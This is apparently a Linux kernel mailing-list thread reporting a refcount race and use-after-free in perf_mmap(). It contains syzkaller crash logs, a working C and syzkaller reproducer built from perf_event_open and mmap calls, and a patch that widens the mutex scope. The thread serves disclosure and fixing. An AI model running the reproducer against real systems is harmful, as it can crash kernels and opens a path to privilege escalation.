NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/(intptr_t)-1,
/*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
if (res != -1)
r[0] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x0 (8 bytes)
// flags: mmap_flags = 0x11 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x2 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
if (res != -1)
r[1] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x100000b (8 bytes)
// flags: mmap_flags = 0x13 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
/*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
/*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1],
/*offset=*/0ul);
return 0;
}
|
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: Haocheng Yu <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
|
{
"author": "Haocheng Yu <yuhaocheng035@gmail.com>",
"date": "Sun, 1 Feb 2026 19:34:36 +0800",
"thread_id": "CAAoXzSqHuQd7k9rp878YBG5gbChgOaProPQ6XBzKpy81JF5sKg@mail.gmail.com.mbox.gz"
}
|
lkml
|
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
|
Hello,
I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.
Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero.
The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later.
I verified this on Linux kernel version 6.18.5.
Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)
Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning
The full report is as below:
audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
</TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc
fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
Reproduce
----------
The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown.
The reproducer follows this execution flow:
1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.
Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.
Patch
--------------
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.
Best regards,
Haocheng Yu
Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug.
audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
</TASK>
---[ end trace 0000000000000000 ]---
Syzkaller reproducer:
# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)
